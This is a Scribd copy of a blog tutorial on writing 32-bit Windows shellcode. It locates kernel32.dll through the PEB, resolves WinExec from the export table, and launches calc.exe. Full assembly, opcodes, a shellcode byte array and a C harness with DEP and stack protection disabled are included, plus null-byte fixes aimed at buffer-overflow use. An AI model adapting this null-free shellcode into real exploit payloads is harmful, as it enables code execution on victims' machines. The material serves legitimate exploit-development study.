0% found this document useful (0 votes)

130 views1 page

Ring 0x00: Basics of Windows Shellcode Writing Table of Contents

The document discusses how to write Windows shellcode by finding the base address of DLLs like kernel32.dll and functions within them, like WinExec, to execute other programs. It explains traversing the Thread Environment Block, Process Environment Block, and in-memory DLL lists to find the DLL base, then exploring the PE file headers and export tables to locate the desired function's address. Diagrams and debugging tools are recommended to understand the complex in-memory process architecture and binary formats involved in Windows shellcode development.

Uploaded by

Mayan Fun

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

130 views1 page

Ring 0x00: Basics of Windows Shellcode Writing Table of Contents

Uploaded by

Mayan Fun

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 1

Ring 0x00

One ring to rule them all

Home About Posts Contact

Maintained by Iliya Dafchev Hosted on GitHub Pages — Theme by mattgraham

Basics of Windows shellcode writing

26 Sep 2017

Table of contents
Introduction
Find the DLL base address
Find the function address
Call the function
Write the shellcode
Test the shellcode
Resources

Introduction
This tutorial is for x86 32bit shellcode. Windows shellcode is a lot harder to write than the shellcode for
Linux and you’ll see why. First we need a basic understanding of the Windows architecture, which is
shown below. Take a good look at it. Everything above the dividing line is in User mode and everything
below is in Kernel mode.

Image Source: https://blogs.msdn.microsoft.com/hanybarakat/2007/02/25/deeper-into-windows-

architecture/

Unlike Linux, in Windows, applications can’t directly accesss system calls. Instead they use functions
from the Windows API ( WinAPI ), which internally call functions from the Native API ( NtAPI ), which in turn
use system calls. The Native API functions are undocumented, implemented in ntdll.dll and also, as can
be seen from the picture above, the lowest level of abstraction for User mode code.

The documented functions from the Windows API are stored in kernel32.dll , advapi32.dll , gdi32.dll and
others. The base services (like working with file systems, processes, devices, etc.) are provided by
kernel32.dll .

So to write shellcode for Windows, we’ll need to use functions from WinAPI or NtAPI . But how do we do
that?

ntdll.dll and kernel32.dll are so important that they are imported by every process.

To demonstrate this I used the tool ListDlls from the sysinternals suite .

The first four DLLs that are loaded by explorer.exe:

The first four DLLs that are loaded by notepad.exe:

I also wrote a little assembly program that does nothing and it has 3 loaded DLLs:

Notice the base addresses of the DLLs. They are the same across processes, because they are loaded
only once in memory and then referenced with pointer/handle by another process if it needs them. This is
done to preserve memory. But those addresses will differ across machines and across reboots.

This means that the shellcode must find where in memory the DLL we’re looking for is located. Then the
shellcode must find the address of the exported function, that we’re going to use.

The shellcode I’m going to write is going to be simple and its only function will be to execute calc.exe . To
accomplish this I’ll make use of the WinExec function, which has only two arguments and is exported by
kernel32.dll .

Find the DLL base address

Thread Environment Block (TEB) is a structure which is unique for every thread, resides in memory and
holds information about the thread. The address of TEB is held in the FS segment register.

One of the fields of TEB is a pointer to Process Environment Block (PEB) structure, which holds
information about the process. The pointer to PEB is 0x30 bytes after the start of TEB .

0x0C bytes from the start, the PEB contains a pointer to PEB_LDR_DATA structure, which provides
information about the loaded DLLs. It has pointers to three doubly linked lists, two of which are
particularly interesting for our purposes. One of the lists is InInitializationOrderModuleList which holds the
DLLs in order of their initialization, and the other is InMemoryOrderModuleList which holds the DLLs in
the order they appear in memory. A pointer to the latter is stored at 0x14 bytes from the start of
PEB_LDR_DATA structure. The base address of the DLL is stored 0x10 bytes below its list entry
connection.

In the pre-Vista Windows versions the first two DLLs in InInitializationOrderModuleList were ntdll.dll and
kernel32.dll , but for Vista and onwards the second DLL is changed to kernelbase.dll .

The second and the third DLLs in InMemoryOrderModuleList are ntdll.dll and kernel32.dll . This is valid
for all Windows versions (at the time of writing) and is the preferred method, because it’s more portable.

So to find the address of kernel32.dll we must traverse several in-memory structures. The steps to do so
are:

Get address of PEB with fs:0x30

Get address of PEB_LDR_DATA (offset 0x0C )
Get address of the first list entry in the InMemoryOrderModuleList (offset 0x14 )
Get address of the second ( ntdll.dll ) list entry in the InMemoryOrderModuleList (offset 0x00 )
Get address of the third ( kernel32.dll ) list entry in the InMemoryOrderModuleList (offset 0x00 )

Get the base address of kernel32.dll (offset 0x10 )

The assembly to do this is:

mov ebx , fs : 0x30 ; Get pointer to PEB

mov ebx , [ ebx + 0x0C ] ; Get pointer to PEB_LDR_DATA
mov ebx , [ ebx + 0x14 ] ; Get pointer to first entry in InMemoryOrderModuleList
mov ebx , [ ebx ] ; Get pointer to second (ntdll.dll) entry in InMemoryOrderModuleList
mov ebx , [ ebx ] ; Get pointer to third (kernel32.dll) entry in InMemoryOrderModuleList
mov ebx , [ ebx + 0x10 ] ; Get kernel32.dll base address

They say a picture is worth a thousand words, so I made one to illustrate the process. Open it in a new
tab, zoom and take a good look.

If a picture is worth a thousand words, then an animation is worth (Number_of_frames * 1000) words.

When learning about Windows shellcode (and assembly in general), WinREPL is really useful to see the
result after every assembly instruction.

Find the function address

Now that we have the base address of kernel32.dll , it’s time to find the address of the WinExec function.
To do this we need to traverse several headers of the DLL. You should get familiar with the format of a
PE executable file. Play around with PEView and check out some great illustrations of file formats .

Relative Virtual Address (RVA) is an address relative to the base address of the PE executable, when its
loaded in memory (RVAs are not equal to the file offsets when the executable is on disk!).

In the PE format, at a constant RVA of 0x3C bytes is stored the RVA of the PE signature which is equal
to 0x5045 .
0x78 bytes after the PE signature is the RVA for the Export Table .
0x14 bytes from the start of the Export Table is stored the number of functions that the DLL exports.
0x1C bytes from the start of the Export Table is stored the RVA of the Address Table , which holds the
function addresses.
0x20 bytes from the start of the Export Table is stored the RVA of the Name Pointer Table , which holds
pointers to the names (strings) of the functions.
0x24 bytes from the start of the Export Table is stored the RVA of the Ordinal Table , which holds the
position of the function in the Address Table .

So to find WinExec we must:

Find the RVA of the PE signature (base address + 0x3C bytes)

Find the address of the PE signature (base address + RVA of PE signature )
Find the RVA of Export Table (address of PE signature + 0x78 bytes)
Find the address of Export Table (base address + RVA of Export Table )
Find the number of exported functions (address of Export Table + 0x14 bytes)
Find the RVA of the Address Table (address of Export Table + 0x1C )
Find the address of the Address Table (base address + RVA of Address Table )
Find the RVA of the Name Pointer Table (address of Export Table + 0x20 bytes)
Find the address of the Name Pointer Table (base address + RVA of Name Pointer Table )
Find the RVA of the Ordinal Table (address of Export Table + 0x24 bytes)
Find the address of the Ordinal Table (base address + RVA of Ordinal Table )
Loop through the Name Pointer Table , comparing each string (name) with “ WinExec ” and keeping
count of the position.
Find WinExec ordinal number from the Ordinal Table (address of Ordinal Table + (position * 2)
bytes). Each entry in the Ordinal Table is 2 bytes.
Find the function RVA from the Address Table (address of Address Table + (ordinal_number * 4)
bytes). Each entry in the Address Table is 4 bytes.
Find the function address (base address + function RVA)

I doubt anyone understood this, so I again made some animations.

And from PEView to make it even more clear.

The assembly to do this is:

; Establish a new stack frame

push ebp
mov ebp , esp

sub esp , 18h ; Allocate memory on stack for local variables

; push the function name on the stack

xor esi , esi
push esi ; null termination
push 63h
pushw 6578h
push 456e6957h
mov [ ebp - 4 ], esp ; var4 = "WinExec\x00"

; Find kernel32.dll base address

mov ebx , fs : 0x30
mov ebx , [ ebx + 0x0C ]
mov ebx , [ ebx + 0x14 ]
mov ebx , [ ebx ]
mov ebx , [ ebx ]
mov ebx , [ ebx + 0x10 ] ; ebx holds kernel32.dll base address
mov [ ebp - 8 ], ebx ; var8 = kernel32.dll base address

; Find WinExec address

mov eax , [ ebx + 3Ch ] ; RVA of PE signature
add eax , ebx ; Address of PE signature = base address + RVA of
mov eax , [ eax + 78h ] ; RVA of Export Table
add eax , ebx ; Address of Export Table

mov ecx , [ eax + 24h ] ; RVA of Ordinal Table

add ecx , ebx ; Address of Ordinal Table
mov [ ebp - 0Ch ], ecx ; var12 = Address of Ordinal Table

mov edi , [ eax + 20h ] ; RVA of Name Pointer Table

add edi , ebx ; Address of Name Pointer Table
mov [ ebp - 10h ], edi ; var16 = Address of Name Pointer Table

mov edx , [ eax + 1Ch ] ; RVA of Address Table

add edx , ebx ; Address of Address Table
mov [ ebp - 14h ], edx ; var20 = Address of Address Table

mov edx , [ eax + 14h ] ; Number of exported functions

xor eax , eax ; counter = 0

.loop:
mov edi , [ ebp - 10h ] ; edi = var16 = Address of Name Pointer Table
mov esi , [ ebp - 4 ] ; esi = var4 = "WinExec\x00"
xor ecx , ecx

cld ; set DF=0 => process strings from left to right

mov edi , [ edi + eax * 4 ] ; Entries in Name Pointer Table are 4 bytes long
; edi = RVA Nth entry = Address of Name Table * 4
add edi , ebx ; edi = address of string = base address + RVA Nth
add cx , 8 ; Length of strings to compare (len('WinExec') =
repe cmpsb ; Compare the first 8 bytes of strings in
; esi and edi registers. ZF=1 if equal, ZF=0 if not

jz start.found

inc eax ; counter++

cmp eax , edx ; check if last function is reached
jb start.loop ; if not the last -> loop

add esp , 26h

jmp start.end ; if function is not found, jump to end

.found:
; the counter (eax) now holds the position of WinExec

mov ecx , [ ebp - 0Ch ] ; ecx = var12 = Address of Ordinal Table

mov edx , [ ebp - 14h ] ; edx = var20 = Address of Address Table

mov ax , [ ecx + eax * 2 ] ; ax = ordinal number = var12 + (counter * 2)

mov eax , [ edx + eax * 4 ] ; eax = RVA of function = var20 + (ordinal * 4)
add eax , ebx ; eax = address of WinExec =
; = kernel32.dll base address + RVA of WinExec

.end:
add esp , 26h ; clear the stack
pop ebp
ret

Call the function

What’s left is to call WinExec with the appropriate arguments:

xor edx , edx

push edx ; null termination
push 6578652eh
push 636c6163h
push 5c32336dh
push 65747379h
push 535c7377h
push 6f646e69h
push 575c3a43h
mov esi , esp ; esi -> "C:\Windows\System32\calc.exe"

push 10 ; window state SW_SHOWDEFAULT

push esi ; "C:\Windows\System32\calc.exe"
call eax ; WinExec

Write the shellcode

Now that you’re familiar with the basic principles of a Windows shellcode it’s time to write it. It’s not much
different than the code snippets I already showed, just have to glue them together, but with minor
differences to avoid null bytes. I used flat assembler to test my code.

The instruction “mov ebx, fs:0x30” contains three null bytes. A way to avoid this is to write it as:

xor esi , esi ; esi = 0

mov ebx , [ fs : 30h + esi ]

The whole assembly for the shellcode is below:

format PE console
use32
entry start

start:
push eax ; Save all registers
push ebx
push ecx
push edx
push esi
push edi
push ebp

; Establish a new stack frame

push ebp
mov ebp , esp

sub esp , 18h ; Allocate memory on stack for local variables

; push the function name on the stack

xor esi , esi
push esi ; null termination
push 63h
pushw 6578h
push 456e6957h
mov [ ebp - 4 ], esp ; var4 = "WinExec\x00"

; Find kernel32.dll base address

xor esi , esi ; esi = 0
mov ebx , [ fs : 30h + esi ] ; written this way to avoid null bytes
mov ebx , [ ebx + 0x0C ]
mov ebx , [ ebx + 0x14 ]
mov ebx , [ ebx ]
mov ebx , [ ebx ]
mov ebx , [ ebx + 0x10 ] ; ebx holds kernel32.dll base address
mov [ ebp - 8 ], ebx ; var8 = kernel32.dll base address

; Find WinExec address

mov eax , [ ebx + 3Ch ] ; RVA of PE signature
add eax , ebx ; Address of PE signature = base address
mov eax , [ eax + 78h ] ; RVA of Export Table
add eax , ebx ; Address of Export Table

mov ecx , [ eax + 24h ] ; RVA of Ordinal Table

add ecx , ebx ; Address of Ordinal Table
mov [ ebp - 0Ch ], ecx ; var12 = Address of Ordinal Table

mov edi , [ eax + 20h ] ; RVA of Name Pointer Table

add edi , ebx ; Address of Name Pointer Table
mov [ ebp - 10h ], edi ; var16 = Address of Name Pointer Table

mov edx , [ eax + 1Ch ] ; RVA of Address Table

add edx , ebx ; Address of Address Table
mov [ ebp - 14h ], edx ; var20 = Address of Address Table

mov edx , [ eax + 14h ] ; Number of exported functions

xor eax , eax ; counter = 0

.loop:
mov edi , [ ebp - 10h ] ; edi = var16 = Address of Name Pointer Table

mov esi , [ ebp - 4 ] ; esi = var4 = "WinExec\x00"

xor ecx , ecx

cld ; set DF=0 => process strings from left to

mov edi , [ edi + eax * 4 ] ; Entries in Name Pointer Table are 4 bytes
; edi = RVA Nth entry = Address of Name Table

add edi , ebx ; edi = address of string = base address

add cx , 8 ; Length of strings to compare (len('WinExec')
repe cmpsb ; Compare the first 8 bytes of strings in
; esi and edi registers. ZF=1 if equal, ZF=0

jz start.found

inc eax ; counter++

cmp eax , edx ; check if last function is reached
jb start.loop ; if not the last -> loop

add esp , 26h

jmp start.end ; if function is not found, jump to end

.found:
; the counter (eax) now holds the position of WinExec

mov ecx , [ ebp - 0Ch ] ; ecx = var12 = Address of Ordinal Table

mov edx , [ ebp - 14h ] ; edx = var20 = Address of Address Table

mov ax , [ ecx + eax * 2 ] ; ax = ordinal number = var12 + (counter

mov eax , [ edx + eax * 4 ] ; eax = RVA of function = var20 + (ordinal
add eax , ebx ; eax = address of WinExec =
; = kernel32.dll base address + RVA of WinExec

xor edx , edx

push edx ; null termination
push 6578652eh
push 636c6163h
push 5c32336dh
push 65747379h
push 535c7377h
push 6f646e69h
push 575c3a43h
mov esi , esp ; esi -> "C:\Windows\System32\calc.exe"

push 10 ; window state SW_SHOWDEFAULT

push esi ; "C:\Windows\System32\calc.exe"
call eax ; WinExec

add esp , 46h ; clear the stack

.end:

pop ebp ; restore all registers and exit

pop edi
pop esi
pop edx
pop ecx
pop ebx
pop eax
ret

Iopened it inIDA to show you a better visualization. The one showed in IDA doesn’t save all the
registers, I added this later, but was too lazy to make new screenshots.

Use fasm to compile, then decompile and extract the opcodes. We got lucky and there are no null bytes.

objdump -d -M intel shellcode.exe

401000: 50 push eax

401001: 53 push ebx
401002: 51 push ecx
401003: 52 push edx
401004: 56 push esi
401005: 57 push edi
401006: 55 push ebp
401007: 89 e5 mov ebp,esp
401009: 83 ec 18 sub esp,0x18
40100c: 31 f6 xor esi,esi
40100e: 56 push esi
40100f: 6a 63 push 0x63
401011: 66 68 78 65 pushw 0x6578
401015: 68 57 69 6e 45 push 0x456e6957
40101a: 89 65 fc mov DWORD PTR [ebp-0x4],esp
40101d: 31 f6 xor esi,esi
40101f: 64 8b 5e 30 mov ebx,DWORD PTR fs:[esi+0x30]
401023: 8b 5b 0c mov ebx,DWORD PTR [ebx+0xc]
401026: 8b 5b 14 mov ebx,DWORD PTR [ebx+0x14]
401029: 8b 1b mov ebx,DWORD PTR [ebx]
40102b: 8b 1b mov ebx,DWORD PTR [ebx]
40102d: 8b 5b 10 mov ebx,DWORD PTR [ebx+0x10]
401030: 89 5d f8 mov DWORD PTR [ebp-0x8],ebx
401033: 31 c0 xor eax,eax
401035: 8b 43 3c mov eax,DWORD PTR [ebx+0x3c]
401038: 01 d8 add eax,ebx
40103a: 8b 40 78 mov eax,DWORD PTR [eax+0x78]
40103d: 01 d8 add eax,ebx
40103f: 8b 48 24 mov ecx,DWORD PTR [eax+0x24]
401042: 01 d9 add ecx,ebx
401044: 89 4d f4 mov DWORD PTR [ebp-0xc],ecx
401047: 8b 78 20 mov edi,DWORD PTR [eax+0x20]
40104a: 01 df add edi,ebx
40104c: 89 7d f0 mov DWORD PTR [ebp-0x10],edi
40104f: 8b 50 1c mov edx,DWORD PTR [eax+0x1c]
401052: 01 da add edx,ebx
401054: 89 55 ec mov DWORD PTR [ebp-0x14],edx
401057: 8b 50 14 mov edx,DWORD PTR [eax+0x14]
40105a: 31 c0 xor eax,eax
40105c: 8b 7d f0 mov edi,DWORD PTR [ebp-0x10]
40105f: 8b 75 fc mov esi,DWORD PTR [ebp-0x4]
401062: 31 c9 xor ecx,ecx
401064: fc cld
401065: 8b 3c 87 mov edi,DWORD PTR [edi+eax*4]
401068: 01 df add edi,ebx
40106a: 66 83 c1 08 add cx,0x8
40106e: f3 a6 repz cmps BYTE PTR ds:[esi],BYTE PTR es:[edi]
401070: 74 0a je 0x40107c
401072: 40 inc eax
401073: 39 d0 cmp eax,edx
401075: 72 e5 jb 0x40105c
401077: 83 c4 26 add esp,0x26
40107a: eb 3f jmp 0x4010bb
40107c: 8b 4d f4 mov ecx,DWORD PTR [ebp-0xc]
40107f: 8b 55 ec mov edx,DWORD PTR [ebp-0x14]
401082: 66 8b 04 41 mov ax,WORD PTR [ecx+eax*2]
401086: 8b 04 82 mov eax,DWORD PTR [edx+eax*4]
401089: 01 d8 add eax,ebx
40108b: 31 d2 xor edx,edx
40108d: 52 push edx
40108e: 68 2e 65 78 65 push 0x6578652e
401093: 68 63 61 6c 63 push 0x636c6163
401098: 68 6d 33 32 5c push 0x5c32336d
40109d: 68 79 73 74 65 push 0x65747379
4010a2: 68 77 73 5c 53 push 0x535c7377
4010a7: 68 69 6e 64 6f push 0x6f646e69
4010ac: 68 43 3a 5c 57 push 0x575c3a43
4010b1: 89 e6 mov esi,esp
4010b3: 6a 0a push 0xa
4010b5: 56 push esi
4010b6: ff d0 call eax
4010b8: 83 c4 46 add esp,0x46
4010bb: 5d pop ebp
4010bc: 5f pop edi
4010bd: 5e pop esi
4010be: 5a pop edx
4010bf: 59 pop ecx
4010c0: 5b pop ebx
4010c1: 58 pop eax
4010c2: c3 ret

When I started learning about shellcode writing, one of the things that got me confused is that in the
disassembled output the jump instructions use absolute addresses (for example look at address 401070 :

“ je 0x40107c ”), which got me thinking how is this working at all? The addresses will be different across

processes and across systems and the shellcode will jump to some arbitrary code at a hardcoded
address. Thats definitely not portable! As it turns out, though, the disassembled output uses absolute
addresses for convenience, in reality the instructions use relative addresses.

Look again at the instruction at address 401070 (“ je 0x40107c ”), the opcodes are “ 74 0a ”, where 74 is
the opcode for je and 0a is the operand (it’s not an address!). The EIP register will point to the next
instruction at address 401072 , add to it the operand of the jump 401072 + 0a = 40107c , which is the
address showed by the disassembler. So there’s the proof that the instructions use relative addressing
and the shellcode will be portable.

And finally the extracted opcodes:

50 53 51 52 56 57 55 89 e5 83 ec 18 31 f6 56 6a 63 66 68 78 65 68 57 69 6e 45 89

Length in bytes:

>>> len(shellcode)
200

It’a a lot bigger than the Linux shellcode I wrote.

Test the shellcode

The last step is to test if it’s working. You can use a simple C program to do this.

#include <stdio.h>

unsigned char sc [] = " \x50\x53\x51\x52\x56\x57\x55\x89 "

" \xe5\x83\xec\x18\x31\xf6\x56\x6a "
" \x63\x66\x68\x78\x65\x68\x57\x69 "
" \x6e\x45\x89\x65\xfc\x31\xf6\x64 "
" \x8b\x5e\x30\x8b\x5b\x0c\x8b\x5b "
" \x14\x8b\x1b\x8b\x1b\x8b\x5b\x10 "
" \x89\x5d\xf8\x31\xc0\x8b\x43\x3c "
" \x01\xd8\x8b\x40\x78\x01\xd8\x8b "
" \x48\x24\x01\xd9\x89\x4d\xf4\x8b "
" \x78\x20\x01\xdf\x89\x7d\xf0\x8b "
" \x50\x1c\x01\xda\x89\x55\xec\x8b "
" \x58\x14\x31\xc0\x8b\x55\xf8\x8b "
" \x7d\xf0\x8b\x75\xfc\x31\xc9\xfc "
" \x8b\x3c\x87\x01\xd7\x66\x83\xc1 "
" \x08\xf3\xa6\x74\x0a\x40\x39\xd8 "
" \x72\xe5\x83\xc4\x26\xeb\x41\x8b "
" \x4d\xf4\x89\xd3\x8b\x55\xec\x66 "
" \x8b\x04\x41\x8b\x04\x82\x01\xd8 "
" \x31\xd2\x52\x68\x2e\x65\x78\x65 "
" \x68\x63\x61\x6c\x63\x68\x6d\x33 "
" \x32\x5c\x68\x79\x73\x74\x65\x68 "
" \x77\x73\x5c\x53\x68\x69\x6e\x64 "
" \x6f\x68\x43\x3a\x5c\x57\x89\xe6 "
" \x6a\x0a\x56\xff\xd0\x83\xc4\x46 "
" \x5d\x5f\x5e\x5a\x59\x5b\x58\xc3 " ;

int main ()
{
(( void ( * )()) sc )();
return 0;
}

To run it successfully in Visual Studio, you’ll have to compile it with some protections disabled:
Security Check: Disabled (/GS-)
Data Execution Prevention (DEP): No

Proof that it works :)

Edit 0x00:
One of the commenters, Nathu , told me about a bug in my shellcode. If you run it on an OS other than
Windows 10 you’ll notice that it’s not working. This is a good opportunity to challenge yourself and try to
fix it on your own by debugging the shellcode and google what may cause such behaviour. It’s an
interesting issue :)

In case you can’t fix it (or don’t want to), you can find the correct shellcode and the reason for the bug
below…

EXPLANATION:
Depending on the compiler options, programs may align the stack to 2, 4 or more byte boundaries
(should by power of 2). Also some functions might expect the stack to be aligned in a certain way.

The alignment is done for optimisation reasons and you can read a good explanation about it here: Stack
Alignment .

Ifyou tried to debug the shellcode, you’ve probably noticed that the problem was with the WinExec
function which returned “ERROR_NOACCESS” error code, although it should have access to calc.exe !

Ifyou read this msdn article , you’ll see the following: “Visual C++ generally aligns data on natural
boundaries based on the target processor and the size of the data, up to 4-byte boundaries on 32-bit
processors, and 8-byte boundaries on 64-bit processors”. I assume the same alignment settings were
used for building the system DLLs.

Because we’re executing code for 32bit architecture, the WinExec function probably expects the stack to
be aligned up to 4-byte boundary. This means that a 2-byte variable will be saved at an address that’s
multiple of 2, and a 4-byte variable will be saved at an address that’s multiple of 4. For example take two
variables - 2 byte and 4 byte in size. If the 2 byte variable is at an address 0x0004 then the 4 byte
variable will be placed at address 0x0008. This means there are 2 bytes padding after the 2 byte
variable. This is also the reason why sometimes the allocated memory on stack for local variables is
larger than necessary.

The part shown below (where ‘WinExec’ string is pushed on the stack) messes up the alignment, which
causes WinExec to fail.

; push the function name on the stack

xor esi , esi
push esi ; null termination
push 63h
pushw 6578h ; THIS PUSH MESSED THE ALIGNMENT
push 456e6957h
mov [ ebp - 4 ], esp ; var4 = "WinExec\x00"

To fix it change that part of the assembly to:

; push the function name on the stack

xor esi , esi ; null termination
push esi
push 636578h ; NOW THE STACK SHOULD BE ALLIGNED PROPERLY
push 456e6957h
mov [ ebp - 4 ], esp ; var4 = "WinExec\x00"

The reason it works on Windows 10 is probably because WinExec no longer requires the stack to be
aligned.

Below you can see the stack alignment issue illustrated:

With the fix the stack is aligned to 4 bytes:

Edit 0x01:
Although it works when it’s used in a compiled binary, the previous change produces a null byte, which is
a problem when used to exploit a buffer overflow. The null byte is caused by the instruction “push
636578h” which assembles to “68 78 65 63 00”.

The version below should work and should not produce null bytes:

xor esi , esi

pushw si ; Pushes only 2 bytes, thus changing the stack alignment to 2-byte
push 63h
pushw 6578h ; Pushing another 2 bytes returns the stack to 4-byte alignment
push 456e6957h
mov [ ebp - 4 ], esp ; edx -> "WinExec\x00"

Resources
For the pictures of the TEB , PEB , etc structures I consulted several resources, because the official
documentation at MSDN is either non existent, incomplete or just plain wrong. Mainly I used ntinternals ,

but I got confused by some other resources I found before that. I’ll list even the wrong resources, that
way if you stumble on them, you won’t get confused (like I did).

[0x00] Windows architecture: https://blogs.msdn.microsoft.com/hanybarakat/2007/02/25/deeper-into-

windows-architecture/

[0x01] WinExec funtion: https://msdn.microsoft.com/en-us/library/windows/desktop/ms687393.aspx

[0x02] TEB explanation: https://en.wikipedia.org/wiki/Win32_Thread_Information_Block

[0x03] PEB explanation: https://en.wikipedia.org/wiki/Process_Environment_Block

[0x04] I took inspiration from this blog, that has great illustration, but uses the older technique with
InInitializationOrderModuleList (which still works for ntdll.dll, but not for kernel32.dll)
http://blog.the-playground.dk/2012/06/understanding-windows-shellcode.html

[0x05] The information for the TEB, PEB, PEB_LDR_DATA and LDR_MODULE I took from here (they
are actually the same as the ones used in resource 0x04, but it’s always good to fact check :) ).
https://undocumented.ntinternals.net/

[0x06] Another correct resource for TEB structure

https://www.nirsoft.net/kernel_struct/vista/TEB.html

[0x07] PEB structure from the official documentation. It is correct, though some fields are shown as
Reserved, which is why I used resource 0x05 (it has their names listed).
https://msdn.microsoft.com/en-us/library/windows/desktop/aa813706.aspx

[0x08] Another resource for the PEB structure. This one is wrong. If you count the byte offset to
PPEB_LDR_DATA, it’s way more than 12 (0x0C) bytes.
https://www.nirsoft.net/kernel_struct/vista/PEB.html

[0x09] PEB_LDR_DATA structure. It’s from the official documentation and clearly WRONG. Pointers to
the other two linked lists are missing.
https://msdn.microsoft.com/en-us/library/windows/desktop/aa813708.aspx

[0x0a] PEB_LDR_DATA structure. Also wrong. UCHAR is 1 byte, counting the byte offset to the linked
lists produces wrong offset.
https://www.nirsoft.net/kernel_struct/vista/PEB_LDR_DATA.html

[0x0b] Explains the “new” and portable way to find kernel32.dll address
http://blog.harmonysecurity.com/2009_06_01_archive.html

[0x0c] Windows Internals book, 6th edition

NDA Curaleaf Wiped
No ratings yet
NDA Curaleaf Wiped
5 pages
Cracking Delphi Programs
No ratings yet
Cracking Delphi Programs
11 pages
PE File Format Compendium 1.1 (By Goppit, ARTeam)
100% (1)
PE File Format Compendium 1.1 (By Goppit, ARTeam)
59 pages
From C To Assembly To Shellcode - Hasherezade
No ratings yet
From C To Assembly To Shellcode - Hasherezade
35 pages
Arteam PE File Format
No ratings yet
Arteam PE File Format
3 pages
Deep Dive Os Internals
No ratings yet
Deep Dive Os Internals
33 pages
Anatomy of A Malware
No ratings yet
Anatomy of A Malware
23 pages
Windows x64 Shellcode
No ratings yet
Windows x64 Shellcode
15 pages
How To Disassemble A Windows Program
100% (1)
How To Disassemble A Windows Program
11 pages
PE File Security
No ratings yet
PE File Security
70 pages
On Windows Syscall Mechanism and Syscall Numbers Extraction Methods
No ratings yet
On Windows Syscall Mechanism and Syscall Numbers Extraction Methods
26 pages
CSE451 Linking and Loading Autumn 2002: Gary Kimura Lecture #21 December 9, 2002
No ratings yet
CSE451 Linking and Loading Autumn 2002: Gary Kimura Lecture #21 December 9, 2002
20 pages
SSTIC2019-Article-dll Shell Game and Other Misdirections-Georges
No ratings yet
SSTIC2019-Article-dll Shell Game and Other Misdirections-Georges
27 pages
SANS Tips For Reverse-Engineering Malicious Code
No ratings yet
SANS Tips For Reverse-Engineering Malicious Code
1 page
Creating Shellcodes in The Win32 Environment
No ratings yet
Creating Shellcodes in The Win32 Environment
34 pages
2023-08-16 - Understanding Syscalls Direct and Indirect and Cobalt Strike Implementation
No ratings yet
2023-08-16 - Understanding Syscalls Direct and Indirect and Cobalt Strike Implementation
26 pages
Understanding Process Memory
No ratings yet
Understanding Process Memory
39 pages
Malware Analysis Series (MAS) - Article 2
No ratings yet
Malware Analysis Series (MAS) - Article 2
96 pages
Unpacking For Dummies Compressed
No ratings yet
Unpacking For Dummies Compressed
78 pages
Reverse Engineering
No ratings yet
Reverse Engineering
5 pages
PE File Format (By Fare9)
No ratings yet
PE File Format (By Fare9)
13 pages
Win 32 Online Games
No ratings yet
Win 32 Online Games
4 pages
Sant Openme
No ratings yet
Sant Openme
5 pages
Dokumen - Tips - Pe File Format Compendium 11 by Goppit Arteam
No ratings yet
Dokumen - Tips - Pe File Format Compendium 11 by Goppit Arteam
60 pages
Offensive Security & Reverse Engineering (OSRE) : Ali Hadi
No ratings yet
Offensive Security & Reverse Engineering (OSRE) : Ali Hadi
110 pages
Gdi Debug From The Windows NT Source Code Leak
No ratings yet
Gdi Debug From The Windows NT Source Code Leak
46 pages
A Paper On How To Use Apis Without Importing Them: Blue - Orka
No ratings yet
A Paper On How To Use Apis Without Importing Them: Blue - Orka
9 pages
Core Security Introduction To Software Vulnerability Exploitation
No ratings yet
Core Security Introduction To Software Vulnerability Exploitation
74 pages
A Journey From High Level Languages, Through Assembly, To The Running Process
No ratings yet
A Journey From High Level Languages, Through Assembly, To The Running Process
14 pages
DLL Injection
No ratings yet
DLL Injection
16 pages
Part 2: Advanced Static Analysis
No ratings yet
Part 2: Advanced Static Analysis
105 pages
Using DLL Functions
No ratings yet
Using DLL Functions
3 pages
Malware Analysis Professional: Analyzing Packers and Manual Unpacking
No ratings yet
Malware Analysis Professional: Analyzing Packers and Manual Unpacking
47 pages
Introduction To Shellcode Development
No ratings yet
Introduction To Shellcode Development
33 pages
Inject Your Code To A Portable Executable File - CodeProject®
100% (1)
Inject Your Code To A Portable Executable File - CodeProject®
40 pages
OS Structure
No ratings yet
OS Structure
23 pages
Spyware Report
No ratings yet
Spyware Report
4 pages
WINSEM2024-25 CSE3041 ETH AP2024254000393 2025-04-09 Reference-Material-I
No ratings yet
WINSEM2024-25 CSE3041 ETH AP2024254000393 2025-04-09 Reference-Material-I
21 pages
Hacking Windows Ce
No ratings yet
Hacking Windows Ce
29 pages
Bypassing Kernel ASLR Target: Windows 10 (Remote Bypass) : Stéfan Le Berre - Heurs
No ratings yet
Bypassing Kernel ASLR Target: Windows 10 (Remote Bypass) : Stéfan Le Berre - Heurs
13 pages
Bypassing ASLR in Windows 10
No ratings yet
Bypassing ASLR in Windows 10
13 pages
Referral Sheet Format
No ratings yet
Referral Sheet Format
2 pages
A Journey From High Level Languages, Through Assembly, To The Running Process
No ratings yet
A Journey From High Level Languages, Through Assembly, To The Running Process
44 pages
The Art of Bootkit Development
100% (1)
The Art of Bootkit Development
77 pages
How To Check Export Functions of Windows 8 NT Kernel by Using Windbg
No ratings yet
How To Check Export Functions of Windows 8 NT Kernel by Using Windbg
7 pages
DLL Injecting
No ratings yet
DLL Injecting
64 pages
2006 Unpacking FSG
No ratings yet
2006 Unpacking FSG
4 pages
2006 Unpacking FSG
No ratings yet
2006 Unpacking FSG
4 pages
ch4 Handouts
No ratings yet
ch4 Handouts
72 pages
WindowsCE Hacking
No ratings yet
WindowsCE Hacking
24 pages
A Museum of Api Obfuscation On Win32
No ratings yet
A Museum of Api Obfuscation On Win32
21 pages
IntroductionToIntelx86 Part1 PDF
No ratings yet
IntroductionToIntelx86 Part1 PDF
113 pages
Hacking Wince
No ratings yet
Hacking Wince
30 pages
Malware Development
No ratings yet
Malware Development
9 pages
PE101 v1
No ratings yet
PE101 v1
1 page
BufferOverflowExploitation 17971
No ratings yet
BufferOverflowExploitation 17971
15 pages
Finding Off Sets
100% (3)
Finding Off Sets
9 pages
The 101 Most Important UNIX and Linux Commands
From Everand
